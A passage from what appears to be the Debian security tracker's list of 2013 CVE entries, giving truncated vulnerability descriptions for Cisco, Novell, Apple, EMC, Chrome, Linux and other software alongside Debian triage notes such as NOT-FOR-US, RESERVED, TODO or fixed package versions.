	NOT-FOR-US: Cisco NX-OS
CVE-2013-1179 (Multiple buffer overflows in the (1) SNMP and (2) License Manager ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-1178 (Multiple buffer overflows in the Cisco Discovery Protocol (CDP) ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-1177 (SQL injection vulnerability in Cisco Network Admission Control (NAC) ...)
	NOT-FOR-US: Cisco Network Admission Control Manager
CVE-2013-1176 (The DSP card on Cisco TelePresence MCU 4500 and 4501 devices before ...)
	NOT-FOR-US: Cisco
CVE-2013-1175 (The SSL logging daemon in the Application Control Engine module in ...)
	NOT-FOR-US: Cisco ACE
CVE-2013-1174 (Cisco Tivoli Business Service Manager (TBSM) in Hosted Collaboration ...)
	NOT-FOR-US: Cisco Tivoli Business Service Manager
CVE-2013-1173 (Heap-based buffer overflow in ciscod.exe in the Cisco Security Service ...)
	NOT-FOR-US: Cisco AnyConnect
CVE-2013-1172 (The Cisco Security Service in Cisco AnyConnect Secure Mobility Client ...)
	NOT-FOR-US: Cisco AnyConnect
CVE-2013-1171 (Multiple cross-site scripting (XSS) vulnerabilities in the ...)
	NOT-FOR-US: Cisco Connected Grid Network Management System (CG-NMS)
CVE-2013-1170 (The Cisco Prime Network Control System (NCS) appliance with software ...)
	NOT-FOR-US: Cisco Prime Network Control System
CVE-2013-1169 (Cisco Unified MeetingPlace Web Conferencing Server 7.x before 7.1MR1 ...)
	NOT-FOR-US: Cisco Unified MeetingPlace Web Conferencing Server
CVE-2013-1168 (The web server in Cisco Unified MeetingPlace Application Server 7.x ...)
	NOT-FOR-US: Cisco Unified MeetingPlace Application Server
CVE-2013-1167 (Cisco IOS XE 3.2 through 3.4 before 3.4.2S, and 3.5, on 1000 series ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-1166 (Cisco IOS XE 3.2 through 3.4 before 3.4.5S, and 3.5 through 3.7 before ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-1165 (Cisco IOS XE 2.x and 3.x before 3.4.5S, and 3.5 through 3.7 before ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-1164 (Cisco IOS XE 3.4 before 3.4.4S, 3.5, and 3.6 on 1000 series ...)
	NOT-FOR-US: Cisco IOS XE
CVE-2013-1163 (Multiple SQL injection vulnerabilities in the device-management ...)
	NOT-FOR-US: Cisco
CVE-2013-1162 (The traffic engineering (TE) processing subsystem in Cisco IOS XR ...)
	NOT-FOR-US: Cisco
CVE-2013-1161 (The XML parser in the Cisco Jabber IM application for Android allows ...)
	NOT-FOR-US: Cisco
CVE-2013-1160 (Cross-site scripting (XSS) vulnerability in the OpenView web menus in ...)
	NOT-FOR-US: Cisco
CVE-2013-1159 (Cross-site scripting (XSS) vulnerability in the Netcool Impact (NCI) ...)
	NOT-FOR-US: Cisco
CVE-2013-1158 (Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring ...)
	NOT-FOR-US: IBM
CVE-2013-1157 (Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring ...)
	NOT-FOR-US: IBM
CVE-2013-1156 (Directory traversal vulnerability in Cisco Prime Central for Hosted ...)
	NOT-FOR-US: Cisco
CVE-2013-1155 (The auth-proxy functionality in Cisco Firewall Services Module (FWSM) ...)
	NOT-FOR-US: Cisco Firewall Services Module
CVE-2013-1154 (The Cisco Small Business 200 Series Smart Switch 1.2.7.76 and earlier, ...)
	NOT-FOR-US: Cisco Small Business switches
CVE-2013-1153 (Cross-site request forgery (CSRF) vulnerability in the web interface ...)
	NOT-FOR-US: Cisco Prime Infrastructure
CVE-2013-1152 (Cisco Adaptive Security Appliances (ASA) devices with software 9.0 ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2013-1151 (Cisco Adaptive Security Appliances (ASA) devices with software 7.x ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2013-1150 (The authentication-proxy implementation on Cisco Adaptive Security ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2013-1149 (Cisco Adaptive Security Appliances (ASA) devices with software 7.x ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2013-1148 (The General Responder implementation in the IP Service Level Agreement ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1147 (The Protocol Translation (PT) functionality in Cisco IOS 12.3 through ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1146 (The Smart Install client functionality in Cisco IOS 12.2 and 15.0 ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1145 (Memory leak in Cisco IOS 12.2, 12.4, 15.0, and 15.1, when Zone-Based ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1144 (Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1143 (The RSVP protocol implementation in Cisco IOS 12.2 and 15.0 through ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1142 (Race condition in the VRF-aware NAT feature in Cisco IOS 12.2 through ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1141 (The mDNS snooping functionality on Cisco Wireless LAN Controller (WLC) ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1140 (The XML parser in Cisco Security Monitoring, Analysis, and Response ...)
	NOT-FOR-US: Cisco Security MARS
CVE-2013-1139 (The nsAPI interface in Cisco Cloud Portal 9.1 SP1 and SP2, and 9.3 ...)
	NOT-FOR-US: Cisco Cloud Portal
CVE-2013-1138 (The NAT process on Cisco Adaptive Security Appliances (ASA) devices ...)
	NOT-FOR-US: Cisco
CVE-2013-1137 (Cisco Unified Presence Server (CUPS) 8.6, 9.0, and 9.1 before 9.1.1 ...)
	NOT-FOR-US: Cisco Unified Presence Server
CVE-2013-1136 (The crypto engine process in Cisco IOS on Aggregation Services Router ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1135 (Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance ...)
	NOT-FOR-US: Cisco Prime Central
CVE-2013-1134 (The Location Bandwidth Manager (LBM) Intracluster-communication ...)
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-1133 (Cisco Unified Communications Manager (CUCM) 8.6 before 8.6(2a)su2, 8.6 ...)
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-1132 RESERVED
CVE-2013-1131 (Cisco Small Business Wireless Access Points WAP200, WAP2000, WAP200E, ...)
	NOT-FOR-US: Cisco Small Business Wireless Access Points
CVE-2013-1130 RESERVED
CVE-2013-1129 (Memory leak in Cisco Unity Connection 9.x allows remote attackers to ...)
	NOT-FOR-US: Cisco
CVE-2013-1128 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...)
	NOT-FOR-US: Cisco Unified MeetingPlace
CVE-2013-1127 RESERVED
CVE-2013-1126 RESERVED
CVE-2013-1125 (The command-line interface in Cisco Identity Services Engine Software, ...)
	NOT-FOR-US: Cisco
CVE-2013-1124 (The Cisco Network Admission Control (NAC) agent on Mac OS X does not ...)
	NOT-FOR-US: Cisco Network Admission Control
CVE-2013-1123 (Multiple cross-site scripting (XSS) vulnerabilities in the server in ...)
	NOT-FOR-US: Cisco Unified MeetingPlace
CVE-2013-1122 (Cisco NX-OS on the Nexus 7000, when a certain Overlay Transport ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-1121 RESERVED
CVE-2013-1120 (Multiple cross-site request forgery (CSRF) vulnerabilities on the ...)
	NOT-FOR-US: Cisco Unity Express
CVE-2013-1119 RESERVED
CVE-2013-1118 RESERVED
CVE-2013-1117 RESERVED
CVE-2013-1116 RESERVED
CVE-2013-1115 RESERVED
CVE-2013-1114 (Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unity ...)
	NOT-FOR-US: Cisco Unity Express
CVE-2013-1113 (Cross-site scripting (XSS) vulnerability in Cisco Unified ...)
	NOT-FOR-US: Cisco Unified Communications Domain Manager
CVE-2013-1112 (Cisco Carrier Routing System (CRS) allows remote attackers to cause a ...)
	NOT-FOR-US: Cisco Carrier Routing System
CVE-2013-1111 (The Cisco ATA 187 Analog Telephone Adaptor with firmware 9.2.1.0 and ...)
	NOT-FOR-US: Cisco ATA 187 Analog Telephone Adaptor
CVE-2013-1110 (Cisco WebEx Training Center allow remote authenticated users to bypass ...)
	NOT-FOR-US: Cisco WebEx Training Center
CVE-2013-1109 (Cross-site request forgery (CSRF) vulnerability in ...)
	NOT-FOR-US: Cisco WebEx Training Center
CVE-2013-1108 (Cisco WebEx Training Center allows remote authenticated users to ...)
	NOT-FOR-US: Cisco WebEx Training Center
CVE-2013-1107 (The search function in Cisco Webex Social (formerly Cisco Quad) allows ...)
	NOT-FOR-US: Cisco Webex Social
CVE-2013-1106 RESERVED
CVE-2013-1105 (Cisco Wireless LAN Controller (WLC) devices with software 7.0 before ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1104 (The HTTP Profiling functionality on Cisco Wireless LAN Controller ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1103 (Cisco Wireless LAN Controller (WLC) devices with software 7.0 before ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1102 (The Wireless Intrusion Prevention System (wIPS) component on Cisco ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1101 RESERVED
CVE-2013-1100 (The HTTP server in Cisco IOS on Catalyst switches does not properly ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1099 RESERVED
CVE-2013-1098 RESERVED
CVE-2013-1097 RESERVED
CVE-2013-1096 RESERVED
CVE-2013-1095 RESERVED
CVE-2013-1094 RESERVED
CVE-2013-1093 RESERVED
CVE-2013-1092 (Multiple unquoted Windows search path vulnerabilities in Novell ...)
	NOT-FOR-US: Novell ZENworks Desktop Management
CVE-2013-1091 (Stack-based buffer overflow in Novell iPrint Client before 5.90 allows ...)
	NOT-FOR-US: Novell iPrint Client
CVE-2013-1090 RESERVED
CVE-2013-1089 RESERVED
CVE-2013-1088 (Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 ...)
	NOT-FOR-US: Novell iManager
CVE-2013-1087 RESERVED
CVE-2013-1086 (Cross-site scripting (XSS) vulnerability in WebAccess in Novell ...)
	NOT-FOR-US: Novell GroupWise
CVE-2013-1085 (Stack-based buffer overflow in the nim: protocol handler in Novell ...)
	NOT-FOR-US: Novell Messenger
CVE-2013-1084 RESERVED
CVE-2013-1083 (Unspecified vulnerability in the login functionality in the Reporting ...)
	NOT-FOR-US: Novell Identity Manager
CVE-2013-1082 (Directory traversal vulnerability in DUSAP.php in Novell ZENworks ...)
	NOT-FOR-US: Novell ZENworks
CVE-2013-1081 (Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile ...)
	NOT-FOR-US: Novell ZENworks
CVE-2013-1080 (The web server in Novell ZENworks Configuration Management (ZCM) 10.3 ...)
	NOT-FOR-US: Novell ZENworks
CVE-2013-1079 (Directory traversal vulnerability in the ISCreateObject method in an ...)
	NOT-FOR-US: Novell ZENworks
CVE-2013-1078 RESERVED
CVE-2013-1077 RESERVED
CVE-2013-1076 RESERVED
CVE-2013-1075 RESERVED
CVE-2013-1074 RESERVED
CVE-2013-1073 RESERVED
CVE-2013-1072 RESERVED
CVE-2013-1071 RESERVED
CVE-2013-1070 RESERVED
CVE-2013-1069 RESERVED
CVE-2013-1068 RESERVED
CVE-2013-1067 RESERVED
CVE-2013-1066 RESERVED
CVE-2013-1065 RESERVED
CVE-2013-1064 RESERVED
CVE-2013-1063 RESERVED
CVE-2013-1062 RESERVED
CVE-2013-1061 RESERVED
CVE-2013-1060 RESERVED
CVE-2013-1059 RESERVED
CVE-2013-1058 RESERVED
CVE-2013-1057 RESERVED
CVE-2013-1056 RESERVED
CVE-2013-1055 RESERVED
CVE-2013-1054 RESERVED
CVE-2013-1053 RESERVED
CVE-2013-1052 (pam-xdg-support, as used in Ubuntu 12.10, does not properly handle the ...)
	NOT-FOR-US: pam-xdg-support (Ubuntu-specific package)
CVE-2013-1051 (apt 0.8.16, 0.9.7, and possibly other versions does not properly ...)
	- apt 0.9.7.8
	[squeeze] - apt (InRelease support not used)
CVE-2013-1050 (The default configuration in gnome-screensaver 3.5.4 through 3.6.0 ...)
	- gnome-screensaver (Ubuntu-specific Unity patch)
CVE-2013-1049 (Buffer overflow in the RFC1413 (ident) client in cfingerd 1.4.3-3 ...)
	{DSA-2635-1}
	- cfingerd 1.4.3-3.1 (bug #700098)
	NOTE: https://bugs.launchpad.net/ubuntu/+source/cfingerd/+bug/1104425
CVE-2013-1048 (The Debian apache2ctl script in the apache2 package squeeze before ...)
	{DSA-2637-1}
	- apache2 2.2.22-13
CVE-2013-1047 RESERVED
CVE-2013-1046 RESERVED
CVE-2013-1045 RESERVED
CVE-2013-1044 RESERVED
CVE-2013-1043 RESERVED
CVE-2013-1042 RESERVED
CVE-2013-1041 RESERVED
CVE-2013-1040 RESERVED
CVE-2013-1039 RESERVED
CVE-2013-1038 RESERVED
CVE-2013-1037 RESERVED
CVE-2013-1036 RESERVED
CVE-2013-1035 RESERVED
CVE-2013-1034 RESERVED
CVE-2013-1033 RESERVED
CVE-2013-1032 RESERVED
CVE-2013-1031 RESERVED
CVE-2013-1030 RESERVED
CVE-2013-1029 RESERVED
CVE-2013-1028 RESERVED
CVE-2013-1027 RESERVED
CVE-2013-1026 RESERVED
CVE-2013-1025 RESERVED
CVE-2013-1024 RESERVED
CVE-2013-1023 RESERVED
CVE-2013-1022 RESERVED
CVE-2013-1021 RESERVED
CVE-2013-1020 RESERVED
CVE-2013-1019 RESERVED
CVE-2013-1018 RESERVED
CVE-2013-1017 RESERVED
CVE-2013-1016 RESERVED
CVE-2013-1015 RESERVED
CVE-2013-1014 (Apple iTunes before 11.0.3 does not properly verify X.509 ...)
	TODO: check
CVE-2013-1013 RESERVED
CVE-2013-1012 RESERVED
CVE-2013-1011 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-1010 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-1009 RESERVED
CVE-2013-1008 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-1007 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-1006 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-1005 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-1004 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-1003 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-1002 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-1001 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-1000 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-0999 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-0998 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-0997 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-0996 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-0995 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-0994 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-0993 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-0992 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-0991 (WebKit, as used in Apple iTunes before 11.0.3, allows ...)
	TODO: check
CVE-2013-0990 RESERVED
CVE-2013-0989 RESERVED
CVE-2013-0988 RESERVED
CVE-2013-0987 RESERVED
CVE-2013-0986 RESERVED
CVE-2013-0985 RESERVED
CVE-2013-0984 RESERVED
CVE-2013-0983 RESERVED
CVE-2013-0982 RESERVED
CVE-2013-0981 (The IOUSBDeviceFamily driver in the USB implementation in the kernel ...)
	NOT-FOR-US: Apple iOS
CVE-2013-0980 (The Passcode Lock implementation in Apple iOS before 6.1.3 does not ...)
	NOT-FOR-US: Apple iOS
CVE-2013-0979 (lockdownd in Lockdown in Apple iOS before 6.1.3 does not properly ...)
	NOT-FOR-US: Apple iOS
CVE-2013-0978 (The ARM prefetch abort handler in the kernel in Apple iOS before 6.1.3 ...)
	NOT-FOR-US: Apple iOS
CVE-2013-0977 (dyld in Apple iOS before 6.1.3 and Apple TV before 5.2.1 does not ...)
	NOT-FOR-US: Apple iOS
CVE-2013-0976 (IOAcceleratorFamily in Apple Mac OS X before 10.8.3 allows remote ...)
	NOT-FOR-US: Mac OS X
CVE-2013-0975 RESERVED
CVE-2013-0974 (StoreKit in Apple iOS before 6.1 does not properly handle the ...)
	NOT-FOR-US: Apple StoreKit
CVE-2013-0973 (Software Update in Apple Mac OS X through 10.7.5 does not prevent ...)
	NOT-FOR-US: Mac OS X
CVE-2013-0972 RESERVED
CVE-2013-0971 (Use-after-free vulnerability in PDFKit in Apple Mac OS X before 10.8.3 ...)
	NOT-FOR-US: Mac OS X
CVE-2013-0970 (Messages in Apple Mac OS X before 10.8.3 allows remote attackers to ...)
	NOT-FOR-US: Mac OS X
CVE-2013-0969 (Login Window in Apple Mac OS X before 10.8.3 does not prevent ...)
	NOT-FOR-US: Mac OS X
CVE-2013-0968 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0967 (CoreTypes in Apple Mac OS X before 10.8.3 includes JNLP files in the ...)
	NOT-FOR-US: Mac OS X
CVE-2013-0966 (The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac ...)
	NOT-FOR-US: Apple mod_hfs_apple
CVE-2013-0965 RESERVED
CVE-2013-0964 (The kernel in Apple iOS before 6.1 and Apple TV before 5.2 does not ...)
	- webkit (bug #700164)
CVE-2013-0963 (Identity Services in Apple iOS before 6.1 does not properly handle ...)
	NOT-FOR-US: Identity Services in Apple iOS
CVE-2013-0962 (Cross-site scripting (XSS) vulnerability in WebKit in Apple iOS before ...)
	- webkit (bug #700164)
CVE-2013-0961 (WebKit in Apple Safari before 6.0.3 allows remote attackers to execute ...)
	NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2013-0960 (WebKit in Apple Safari before 6.0.3 allows remote attackers to execute ...)
	NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2013-0959 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0958 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0957 RESERVED
CVE-2013-0956 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0955 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0954 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0953 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0952 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0951 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0950 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0949 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0948 (WebKit, as used in Apple iOS before 6.1, allows remote attackers to ...)
	- webkit (bug #700164)
CVE-2013-0947 RESERVED
CVE-2013-0946 (Buffer overflow in the Library Control Program (LCP) in EMC AlphaStor ...)
	NOT-FOR-US: EMC
CVE-2013-0945 (EMC Avamar Client before 6.1.101-89 does not verify that the server ...)
	NOT-FOR-US: EMC Avamar
CVE-2013-0944 (The web-based file-restore interface in EMC Avamar Server before 6.1.0 ...)
	NOT-FOR-US: EMC Avamar
CVE-2013-0943 RESERVED
CVE-2013-0942 RESERVED
CVE-2013-0941 RESERVED
CVE-2013-0940 (The nsrpush process in the client in EMC NetWorker before 7.6.5.3 and ...)
	NOT-FOR-US: EMC NetWorker
CVE-2013-0939 (EMC Documentum Webtop before 6.7 SP2, Documentum WDK before 6.7 SP2, ...)
	NOT-FOR-US: EMC
CVE-2013-0938 (Cross-site scripting (XSS) vulnerability in EMC Documentum Webtop ...)
	NOT-FOR-US: EMC
CVE-2013-0937 (Session fixation vulnerability in EMC Documentum Webtop before 6.7 ...)
	NOT-FOR-US: EMC
CVE-2013-0936 (Cross-site scripting (XSS) vulnerability in EMC Smarts IP Manager, ...)
	NOT-FOR-US: EMC
CVE-2013-0935 (EMC Smarts Network Configuration Manager (NCM) before 9.2 does not ...)
	NOT-FOR-US: EMC
CVE-2013-0934 (EMC RSA Archer 5.x before GRC 5.3SP1, and Archer Smart Suite Framework ...)
	NOT-FOR-US: EMC
CVE-2013-0933 (Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer ...)
	NOT-FOR-US: EMC
CVE-2013-0932 (EMC RSA Archer 5.x before GRC 5.3SP1, and Archer Smart Suite Framework ...)
	NOT-FOR-US: EMC
CVE-2013-0931 (EMC RSA Authentication Agent 7.1.x before 7.1.2 on Windows does not ...)
	NOT-FOR-US: EMC RSA
CVE-2013-0930 (Buffer overflow in Drive Control Program (DCP) in EMC AlphaStor 4.0 ...)
	NOT-FOR-US: EMC AlphaStor
CVE-2013-0929 (Format string vulnerability in the _vsnsprintf function in rrobotd.exe ...)
	NOT-FOR-US: EMC AlphaStor
CVE-2013-0928 (The NetWorker command processor in rrobotd.exe in the Device Manager ...)
	NOT-FOR-US: EMC AlphaStor
CVE-2013-0927 (Google Chrome OS before 26.0.1410.57 relies on a Pango pango-utils.c ...)
	NOT-FOR-US: Chrome OS
CVE-2013-0926 (Google Chrome before 26.0.1410.43 does not properly handle active ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0925 (Google Chrome before 26.0.1410.43 does not ensure that an extension ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0924 (The extension functionality in Google Chrome before 26.0.1410.43 does ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0923 (The USB Apps API in Google Chrome before 26.0.1410.43 allows remote ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0922 (Google Chrome before 26.0.1410.43 does not properly restrict ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0921 (The Isolated Sites feature in Google Chrome before 26.0.1410.43 does ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0920 (Use-after-free vulnerability in the extension bookmarks API in Google ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0919 (Use-after-free vulnerability in Google Chrome before 26.0.1410.43 on ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0918 (Google Chrome before 26.0.1410.43 does not prevent navigation to ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0917 (The URL loader in Google Chrome before 26.0.1410.43 allows remote ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0916 (Use-after-free vulnerability in the Web Audio implementation in Google ...)
	- chromium-browser 26.0.1410.43-1
CVE-2013-0915 (The GPU process in Google Chrome OS before 25.0.1364.173 allows ...)
	NOT-FOR-US: Overflow in Chrome-specific libs
CVE-2013-0914 (The flush_signal_handlers function in kernel/signal.c in the Linux ...)
	{DSA-2668-1}
	- linux 3.2.41-1 (low)
	- linux-2.6 (low)
CVE-2013-0913 (Integer overflow in drivers/gpu/drm/i915/i915_gem_execbuffer.c in the ...)
	- linux 3.2.41-2
	- linux-2.6
	[squeeze] - linux-2.6 (Vulnerable code was introduced later)
CVE-2013-0912 (WebKit in Google Chrome before 25.0.1364.160 allows remote attackers ...)
	- chromium-browser 25.0.1364.160-1
CVE-2013-0911 (Directory traversal vulnerability in Google Chrome before ...)
	- chromium-browser 25.0.1364.152-1
CVE-2013-0910 (Google Chrome before 25.0.1364.152 does not properly manage the ...)
	- chromium-browser 25.0.1364.152-1
CVE-2013-0909 (The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote ...)
	- chromium-browser 25.0.1364.152-1
CVE-2013-0908 (Google Chrome before 25.0.1364.152 does not properly manage bindings ...)
	- chromium-browser 25.0.1364.152-1
CVE-2013-0907 (Race condition in Google Chrome before 25.0.1364.152 allows remote ...)
	- chromium-browser 25.0.1364.152-1
CVE-2013-0906 (The IndexedDB implementation in Google Chrome before 25.0.1364.152 ...)
	- chromium-browser 25.0.1364.152-1
CVE-2013-0905 (Use-after-free vulnerability in Google Chrome before 25.0.1364.152 ...)
	- chromium-browser 25.0.1364.152-1
CVE-2013-0904 (The Web Audio implementation in Google Chrome before 25.0.1364.152 ...)
	- chromium-browser 25.0.1364.152-1
CVE-2013-0903 (Use-after-free vulnerability in Google Chrome before 25.0.1364.152 ...)
	- chromium-browser 25.0.1364.152-1
CVE-2013-0902 (Use-after-free vulnerability in the frame-loader implementation in ...)
	- chromium-browser 25.0.1364.152-1
CVE-2013-0901
	RESERVED
CVE-2013-0900 (Race condition in the International Components for Unicode (ICU) ...)
	- chromium-browser 25.0.1364.97-1
	- icu 4.8.1.1-12 (low; bug #702346)
	[squeeze] - icu (Minor issue)
CVE-2013-0899 (Integer overflow in the padding implementation in the ...)
	- chromium-browser 25.0.1364.97-1
	- opus 0.9.14+20120615-1+nmu1 (bug #704870)
CVE-2013-0898 (Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0897 (Off-by-one error in the PDF functionality in Google Chrome before ...)
	- chromium-browser (PDF viewer not included in Chromium)
CVE-2013-0896 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0895 (Google Chrome before 25.0.1364.97 on Linux, and before 25.0.1364.99 on ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0894 (Buffer overflow in the vorbis_parse_setup_hdr_floors function in the ...)
	- chromium-browser 25.0.1364.97-1
	- ffmpeg
	- libav 6:0.8.6-1 (bug #703200)
CVE-2013-0893 (Race condition in Google Chrome before 25.0.1364.97 on Windows and ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0892 (Multiple unspecified vulnerabilities in the IPC layer in Google Chrome ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0891 (Integer overflow in Google Chrome before 25.0.1364.97 on Windows and ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0890 (Multiple unspecified vulnerabilities in the IPC layer in Google Chrome ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0889 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0888 (Skia, as used in Google Chrome before 25.0.1364.97 on Windows and ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0887 (The developer-tools process in Google Chrome before 25.0.1364.97 on ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0886 (Google Chrome before 25.0.1364.99 on Mac OS X does not properly ...)
	- chromium-browser (Mac OS X only)
CVE-2013-0885 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0884 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0883 (Skia, as used in Google Chrome before 25.0.1364.97 on Windows and ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0882 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0881 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0880 (Use-after-free vulnerability in Google Chrome before 25.0.1364.97 on ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0879 (Google Chrome before 25.0.1364.97 on Windows and Linux, and before ...)
	- chromium-browser 25.0.1364.97-1
CVE-2013-0878
	RESERVED
CVE-2013-0877
	RESERVED
CVE-2013-0876
	RESERVED
CVE-2013-0875
	RESERVED
CVE-2013-0874
	RESERVED
CVE-2013-0873
	RESERVED
CVE-2013-0872
	RESERVED
CVE-2013-0871 (Race condition in the ptrace functionality in the Linux kernel before ...)
	{DSA-2632-1}
	- linux 3.2.39-1
	- linux-2.6
CVE-2013-0870
	RESERVED
CVE-2013-0869
	RESERVED
CVE-2013-0868
	RESERVED
CVE-2013-0867
	RESERVED
CVE-2013-0866
	RESERVED
CVE-2013-0865
	RESERVED
CVE-2013-0864
	RESERVED
CVE-2013-0863
	RESERVED
CVE-2013-0862
	RESERVED
CVE-2013-0861
	RESERVED
CVE-2013-0860
	RESERVED
CVE-2013-0859
	RESERVED
CVE-2013-0858
	RESERVED
CVE-2013-0857
	RESERVED
CVE-2013-0856
	RESERVED
CVE-2013-0855
	RESERVED
CVE-2013-0854
	RESERVED
CVE-2013-0853
	RESERVED
CVE-2013-0852
	RESERVED
CVE-2013-0851
	RESERVED
CVE-2013-0850
	RESERVED
CVE-2013-0849
	RESERVED
CVE-2013-0848
	RESERVED
CVE-2013-0847
	RESERVED
CVE-2013-0846
	RESERVED
CVE-2013-0845
	RESERVED
CVE-2013-0844
	RESERVED
CVE-2013-0843 (content/renderer/media/webrtc_audio_renderer.cc in Google Chrome ...)
	- chromium-browser (MacOS-specific)
CVE-2013-0842 (Google Chrome before 24.0.1312.56 does not properly handle %00 ...)
